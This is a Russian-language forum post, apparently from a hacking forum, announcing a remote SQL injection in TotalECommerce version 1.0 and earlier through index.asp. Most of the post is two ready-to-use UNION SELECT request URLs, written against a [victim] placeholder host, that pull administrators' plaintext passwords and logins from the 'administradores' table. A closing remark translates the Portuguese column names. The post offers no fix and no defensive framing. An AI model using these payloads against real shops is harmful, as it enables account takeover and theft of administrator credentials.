• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Уязвимости: TotalECommerce

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
SQL-инъекция в TotalECommerce <=1.0
программа: TotalECommerce <= 1.0
Описание:
Вчера была найдена Remote SQL-инъекция в TotalECommerce <= 1.0. Уязвим файл index.asp. Дает возможность получить чистый пароль любого администратора и его логин.
Использование:
Код:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
Пример1 ->
Код:
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha+from+administradores
Пример 2 ->
Код:
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login+from+administradoresъ

подробнее
P.S. Уязвимость по ходу нашёл какой-то португалец т.к. по португальски
senha - Означает пароль
administradores - Означает администраторы...
secao - сессия...
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх